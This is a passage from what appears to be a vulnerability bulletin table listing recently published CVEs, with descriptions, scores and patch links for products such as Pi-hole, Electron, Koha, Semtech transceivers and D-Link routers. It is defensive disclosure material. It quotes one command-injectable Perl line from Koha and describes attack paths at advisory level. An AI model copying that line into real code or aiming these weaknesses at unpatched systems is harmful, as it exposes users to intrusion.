    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33404" target=3D= "_blank" rel=3D"noopener">CVE-2026-33404</a></td>
    <td>
    <a href=3D"https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85w= p-ww9v" target=3D"_blank" rel=3D"noopener">https://github.com/pi-hole/web/s= ecurity/advisories/GHSA-px6w-85wp-ww9v</a><br>=C2=A0</td>
    </tr>

    <tr>
    <td class="vendor-product">pi-hole--web</td>
    <td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, the formatInfo() function in queries.js renders data.upstream, data.client.ip, and data.ede.text into HTML without escaping when a user expands a query row in the Query Log, enabling stored HTML injection. JavaScript execution is blocked by the server's CSP (script-src 'self'). The same fields are properly escaped in the table view (rowCallback), confirming the omission was an oversight. This vulnerability is fixed in 6.5.</td>
    <td>2026-04-06</td>
    <td>3.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33405" target="_blank" rel="noopener">CVE-2026-33405</a></td>
    <td>
    <a href="https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2r-62vq" target="_blank" rel="noopener">https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2r-62vq</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenStack--Keystone</td>
    <td>An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.</td>
    <td>2026-04-10</td>
    <td>3.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33551" target="_blank" rel="noopener">CVE-2026-33551</a></td>
    <td>
    <a href="https://bugs.launchpad.net/keystone/+bug/2142138" target="_blank" rel="noopener">https://bugs.launchpad.net/keystone/+bug/2142138</a><br><a href="https://security.openstack.org/ossa/OSSA-2026-005.html" target="_blank" rel="noopener">https://security.openstack.org/ossa/OSSA-2026-005.html</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">harttle--liquidjs</td>
    <td>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, the replace filter in LiquidJS incorrectly accounts for memory usage when the memoryLimit option is enabled. It charges str.length + pattern.length + replacement.length bytes to the memory limiter, but the actual output from str.split(pattern).join(replacement) can be quadratically larger when the pattern occurs many times in the input string. This allows an attacker who controls template content to bypass the memoryLimit DoS protection with approximately 2,500x amplification, potentially causing out-of-memory conditions. This vulnerability is fixed in 10.25.3.</td>
    <td>2026-04-08</td>
    <td>3.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34166" target="_blank" rel="noopener">CVE-2026-34166</a></td>
    <td>
    <a href="https://github.com/harttle/liquidjs/security/advisories/GHSA-mmg9-6m6j-jqqx" target="_blank" rel="noopener">https://github.com/harttle/liquidjs/security/advisories/GHSA-mmg9-6m6j-jqqx</a><br><a href="https://github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f4945183167abeb25" target="_blank" rel="noopener">https://github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f4945183167abeb25</a><br><a href="https://github.com/harttle/liquidjs/releases/tag/v10.25.3" target="_blank" rel="noopener">https://github.com/harttle/liquidjs/releases/tag/v10.25.3</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">electron--electron</td>
    <td>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. From 33.0.0-alpha.1 to before 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that use offscreen rendering with GPU shared textures may be vulnerable to a use-after-free. Under certain conditions, the release() callback provided on a paint event texture can outlive its backing native state, and invoking it after that point dereferences freed memory in the main process, which may lead to a crash or memory corruption. Apps are only affected if they use offscreen rendering with webPreferences.offscreen: { useSharedTexture: true }. Apps that do not enable shared-texture offscreen rendering are not affected. To mitigate this issue, ensure texture.release() is called promptly after the texture has been consumed, before the texture object becomes unreachable. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.</td>
    <td>2026-04-06</td>
    <td>2.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34764" target="_blank" rel="noopener">CVE-2026-34764</a></td>
    <td>
    <a href="https://github.com/electron/electron/security/advisories/GHSA-8x5q-pvf5-64mp" target="_blank" rel="noopener">https://github.com/electron/electron/security/advisories/GHSA-8x5q-pvf5-64mp</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">electron--electron</td>
    <td>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that call clipboard.readImage() may be vulnerable to a denial of service. If the system clipboard contains image data that fails to decode, the resulting null bitmap is passed unchecked to image construction, triggering a controlled abort and crashing the process. Apps are only affected if they call clipboard.readImage(). Apps that do not read images from the clipboard are not affected. This issue does not allow memory corruption or code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.</td>
    <td>2026-04-07</td>
    <td>2.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34781" target="_blank" rel="noopener">CVE-2026-34781</a></td>
    <td>
    <a href="https://github.com/electron/electron/security/advisories/GHSA-f37v-82c4-4x64" target="_blank" rel="noopener">https://github.com/electron/electron/security/advisories/GHSA-f37v-82c4-4x64</a><br>&nbsp;</td>
    </tr>
    </tbody>
    </table>
    <p><a href="#top">Back to top</a></p>
    </div>
    <div id="snya_v">
    <h2 id="snya_v_title">Severity Not Yet Assigned</h2>
    <table id="table_severity_not_yet_assigned" class="table no-tablesaw" style="table-layout: fixed; width: 100%;" border="1" summary="Severity Not Yet Assigned" align="center">
    <thead>
    <tr>
    <th class="vendor-product" style="width: 24%;" scope="col">
    <span class="primary-vendor">Primary</span><br><span class="primary-vendor">Vendor</span> -- Product</th>
    <th style="width: 44%;" scope="col">Description</th>
    <th style="width: 10%;" scope="col">Published</th>
    <th style="width: 8%;" scope="col">CVSS Score</th>
    <th style="width: 7%;" scope="col">Source Info</th>
    <th style="width: 7%;" scope="col">Patch Info</th>
    </tr>
    </thead>
    <tbody>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of the redirect parameter to /login. This vulnerability is fixed in 2.0-beta.2.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-66447" target="_blank" rel="noopener">CVE-2025-66447</a></td>
    <td>
    <a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--Stakeholder-Specific Vulnerability Categorization (SSVC)</td>
    <td>QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a crafted request</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-46945" target="_blank" rel="noopener">CVE-2023-46945</a></td>
    <td>
    <a href="https://qd-today.github.io/qd/" target="_blank" rel="noopener">https://qd-today.github.io/qd/</a><br><a href="https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056" target="_blank" rel="noopener">https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--Koha 23.05.10</td>
    <td>Koha Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to remote code execution. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to command injection via shell metacharacters because input data can be controlled by an attacker and is directly included in a system command, i.e., an attack can occur via malicious filenames after uploading a .zip file and clicking Process Images.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2024-36057" target="_blank" rel="noopener">CVE-2024-36057</a></td>
    <td>
    <a href="https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md" target="_blank" rel="noopener">https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md</a><br><a href="https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md" target="_blank" rel="noopener">https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md</a><br><a href="https://github.com/hacklantic/Research/tree/main/CVE-2024-36057" target="_blank" rel="noopener">https://github.com/hacklantic/Research/tree/main/CVE-2024-36057</a><br><a href="https://koha-community.org/koha-22-05-22-released/" target="_blank" rel="noopener">https://koha-community.org/koha-22-05-22-released/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--Koha 23.05.10</td>
    <td>The Send Basket functionality in Koha Library before 23.05.10 is susceptible to Time-Based SQL Injection because it fails to sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users to read arbitrary data from the database.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2024-36058" target="_blank" rel="noopener">CVE-2024-36058</a></td>
    <td>
    <a href="https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md" target="_blank" rel="noopener">https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md</a><br><a href="https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md" target="_blank" rel="noopener">https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md</a><br><a href="https://koha-community.org/koha-22-05-22-released/" target="_blank" rel="noopener">https://koha-community.org/koha-22-05-22-released/</a><br><a href="https://github.com/hacklantic/Research/tree/main/CVE-2024-36058" target="_blank" rel="noopener">https://github.com/hacklantic/Research/tree/main/CVE-2024-36058</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Unknown--YML for Yandex Market</td>
    <td>The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14545" target="_blank" rel="noopener">CVE-2025-14545</a></td>
    <td>
    <a href="https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/" target="_blank" rel="noopener">https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Canonical--Ubuntu</td>
    <td>In Ubuntu, Subiquity version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, Subiquity could include certain user credentials, such as the user's plaintext Wi-Fi password, in the attached logs.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14551" target="_blank" rel="noopener">CVE-2025-14551</a></td>
    <td>
    <a href="https://github.com/canonical/subiquity/pull/2358" target="_blank" rel="noopener">noble backport - stop logging network config and identity data</a><br><a href="https://github.com/canonical/subiquity/pull/2357" target="_blank" rel="noopener">Stop logging identity data and network secrets</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Mitsubishi Electric Corporation--GENESIS64</td>
    <td>Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior allows a local attacker to disclose the SQL Server credentials stored in plaintext within the local SQLite file by exploiting this vulnerability, when the local caching feature using SQLite is enabled and SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially causing a denial-of-service (DoS) condition on the system.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14815" target="_blank" rel="noopener">CVE-2025-14815</a></td>
    <td>
    <a href="https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf" target="_blank" rel="noopener">https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf</a><br><a href="https://jvn.jp/vu/JVNVU90646130/" target="_blank" rel="noopener">https://jvn.jp/vu/JVNVU90646130/</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01" target="_blank" rel="noopener">https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Mitsubishi Electric Corporation--GENESIS64</td>
    <td>Cleartext Storage of Sensitive Information in GUI vulnerability in Mitsubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior allows a local attacker to disclose the SQL Server credentials displayed in plain text in the GUI of the Hyper Historian Splitter feature by exploiting this vulnerability, when SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially causing a denial-of-service (DoS) condition on the system.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14816" target="_blank" rel="noopener">CVE-2025-14816</a></td>
    <td>
    <a href="https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf" target="_blank" rel="noopener">https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01" target="_blank" rel="noopener">https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01</a><br><a href="https://jvn.jp/vu/JVNVU90646130/" target="_blank" rel="noopener">https://jvn.jp/vu/JVNVU90646130/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Semtech--LR1110</td>
    <td>An improper access control vulnerability exists in Semtech LoRa LR11xxx transceivers running early versions of firmware where the memory write command accessible via the physical SPI interface fails to enforce write protection on the program call stack. An attacker with physical access to the SPI interface can overwrite stack memory to hijack program control flow and achieve limited arbitrary code execution. However, the impact is limited to the active attack session: the device's secure boot mechanism prevents persistent firmware modification, the crypto engine isolates cryptographic keys from direct firmware access, and all modifications are lost upon device reboot or loss of physical access.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14857" target="_blank" rel="noopener">CVE-2025-14857</a></td>
    <td>
    <a href="https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001" target="_blank" rel="noopener">https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Semtech--LR1110</td>
    <td>The Semtech LR11xx LoRa transceivers running early versions of firmware contain an information disclosure vulnerability in their firmware validation functionality. When a host issues a firmware validity check command via the SPI interface, the device decrypts the provided encrypted firmware package block-by-block to validate its integrity. However, the last decrypted firmware block remains uncleared in memory after the validation process completes. An attacker with access to the SPI interface can subsequently issue memory read commands to retrieve the decrypted firmware contents from this residual memory, effectively bypassing the firmware encryption protection mechanism. The attack requires physical access to the device's SPI interface.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14858" target="_blank" rel="noopener">CVE-2025-14858</a></td>
    <td>
    <a href="https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001" target="_blank" rel="noopener">https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Semtech--LR1110</td>
    <td>The Semtech LR11xx LoRa transceivers implement secure boot functionality using digital signatures to authenticate firmware. However, the implementation uses a non-standard cryptographic hashing algorithm that is vulnerable to second preimage attacks. An attacker with physical access to the device can exploit this weakness to generate a malicious firmware image with a hash collision, bypassing the secure boot verification mechanism and installing arbitrary unauthorized firmware on the device.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14859" target="_blank" rel="noopener">CVE-2025-14859</a></td>
    <td>
    <a href="https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001" target="_blank" rel="noopener">https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Canonical--Ubuntu</td>
    <td>In Ubuntu, ubuntu-desktop-provision version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, ubuntu-desktop-provision could include the user's password hash in the attached logs.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-15480" target="_blank" rel="noopener">CVE-2025-15480</a></td>
    <td>
    <a href="https://github.com/canonical/ubuntu-desktop-provision/pull/1400" target="_blank" rel="noopener">feat: don't log identity data (noble backport)</a><br><a href="https://github.com/canonical/ubuntu-desktop-provision/pull/1399" target="_blank" rel="noopener">feat: don't log identity data</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Unknown--Popup Box</td>
    <td>The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-15611" target="_blank" rel="noopener">CVE-2025-15611</a></td>
    <td>
    <a href="https://wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f7f226/" target="_blank" rel="noopener">https://wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f7f226/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Ping Identity--PingIDM</td>
    <td>An insufficient granularity of access control vulnerability exists in PingIDM (formerly ForgeRock Identity Management) where administrators cannot properly configure access rules for Remote Connector Servers (RCS) running in client mode. This means attackers can spoof a client-mode RCS (if one exists) to intercept and/or modify an identity's security-relevant properties, such as passwords and account recovery information. This issue is exploitable only when an RCS is configured to run in client mode.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-20628" target="_blank" rel="noopener">CVE-2025-20628</a></td>
    <td>
    <a href="https://backstage.forgerock.com/knowledge/advisories/article/a14305629?rev=_newest" target="_blank" rel="noopener">https://backstage.forgerock.com/knowledge/advisories/article/a14305629?rev=_newest</a><br><a href="https://backstage.pingidentity.com/downloads/browse/idm/featured" target="_blank" rel="noopener">https://backstage.pingidentity.com/downloads/browse/idm/featured</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Nokia--MantaRay NM</td>
    <td>Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-24817" target="_blank" rel="noopener">CVE-2025-24817</a></td>
    <td>
    <a href="https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/" target="_blank" rel="noopener">https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Nokia--MantaRay NM</td>
    <td>Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-24818" target="_blank" rel="noopener">CVE-2025-24818</a></td>
    <td>
    <a href="https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/" target="_blank" rel="noopener">https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Nokia--MantaRay NM</td>
    <td>Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerability due to improper validation of input parameter on the file system in Software Manager application.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-24819" target="_blank" rel="noopener">CVE-2025-24819</a></td>
    <td>
    <a href="https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24819/" target="_blank" rel="noopener">https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24819/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Checkmk GmbH--Checkmk</td>
    <td>Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-39666" target="_blank" rel="noopener">CVE-2025-39666</a></td>
    <td>
    <a href="https://checkmk.com/werk/18891" target="_blank" rel="noopener">https://checkmk.com/werk/18891</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--OwnTone - open source (audio) media server</td>
    <td>owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-44560" target="_blank" rel="noopener">CVE-2025-44560</a></td>
    <td>
    <a href="https://github.com/owntone/owntone-server/issues/1873" target="_blank" rel="noopener">https://github.com/owntone/owntone-server/issues/1873</a><br><a href="https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3" target="_blank" rel="noopener">https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8300</td>
    <td>D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the ip parameter in the ip_position_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-45057" target="_blank" rel="noopener">CVE-2025-45057</a></td>
    <td>
    <a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300" target="_blank" rel="noopener">https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8300</td>
    <td>D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fx parameter in the jingx_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-45058" target="_blank" rel="noopener">CVE-2025-45058</a></td>
    <td>
    <a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300" target="_blank" rel="noopener">https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8300</td>
    <td>D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fn parameter in the tgfile_htm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-45059" target="_blank" rel="noopener">CVE-2025-45059</a></td>
    <td>
    <a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300" target="_blank" rel="noopener">https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">www[.]rrweb[.]io/ -- rrwebplayer</td>
    <td>A cross-site scripting (XSS) vulnerability in rrweb-snapshot before v2.0.0-alpha.18 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-45806" target="_blank" rel="noopener">CVE-2025-45806</a></td>
    <td>
    <a href="https://github.com/rrweb-io/rrweb" target="_blank" rel="noopener">https://github.com/rrweb-io/rrweb</a><br><a href="https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot" target="_blank" rel="noopener">https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot</a><br><a href="https://github.com/rrweb-io/rrweb/issues/1817" target="_blank" rel="noopener">https://github.com/rrweb-io/rrweb/issues/1817</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Google--Android</td>
    <td>In importWrappedKey of KMKeymasterApplet.java, there is a possible way to access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-48651" target="_blank" rel="noopener">CVE-2025-48651</a></td>
    <td><a href="https://source.android.com/docs/security/bulletin/2026/2026-04-01" target="_blank" rel="noopener">https://source.android.com/docs/security/bulletin/2026/2026-04-01</a></td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in the User Evaluation, Message, and Comment modules.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50228" target="_blank" rel="noopener">CVE-2025-50228</a></td>
    <td><a href="https://github.com/Cherry-toto/jizhicms" target="_blank" rel="noopener">https://github.com/Cherry-toto/jizhicms</a><br><a href="https://www.jizhicms.cn" target="_blank" rel="noopener">https://www.jizhicms.cn</a><br><a href="https://github.com/Cherry-toto/jizhicms/issues/104" target="_blank" rel="noopener">https://github.com/Cherry-toto/jizhicms/issues/104</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of user input in the qj.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
